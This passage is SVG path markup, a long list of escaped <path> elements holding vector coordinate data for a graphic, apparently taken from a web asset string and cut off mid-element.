d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n        <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n        <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n        <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n        <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n        <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n        <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n        <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n        <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n        <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n        <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n        <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n        <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n        <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n        <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n        <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n        <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n        <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n        <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n        <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n        <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n        <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n        <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n        <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n        <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n        <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n        <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n        <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n        <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n        <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n        <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n        <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n        <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n        <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n        <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n        <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n        <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n        <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n        <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n        <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n        <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n        <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n        <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n        <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n        <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n        <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n        <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n        <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n        <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n        <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n        <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n        <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n        <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n        <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n        <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n        <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n        <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n        <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n        <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n        <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n        <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n        <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n        <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n        <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n        <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n        <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n        <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n        <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n        <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n        <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n        <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n        <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n        <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n        <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n        <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n        <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n        <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n        <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n        <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n        <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n        <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n        <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n        <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n        <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n        <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n        <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n        <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n        <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n        <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n        <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n        <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n        <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n        <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n        <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n        <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n        <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n        <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n        <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n        <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n        <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n        <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n        <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n        <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n        <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n        <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n        <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n        <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n        <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n        <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n        <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n        <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n        <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n        <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n        <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n        <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n        <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n        <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n        <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n        <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n        <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n        <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n        <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n        <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n        <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n        <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n        <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n        <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n        <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n        <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n        <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n        <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n        <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n        <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n        <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n        <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n        <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n        <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n        <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n        <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n        <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n        <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n        <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n        <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n        <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n        <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n        <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n        <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n        <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n        <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n        <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n        <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n        <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n        <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n        <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n        <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n        <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n        <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n        <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n        <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n        <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n        <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n        <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n        <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n        <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n        <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n        <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n        <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n        <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n        <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n        <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n        <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n        <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n        <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n        <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n        <path 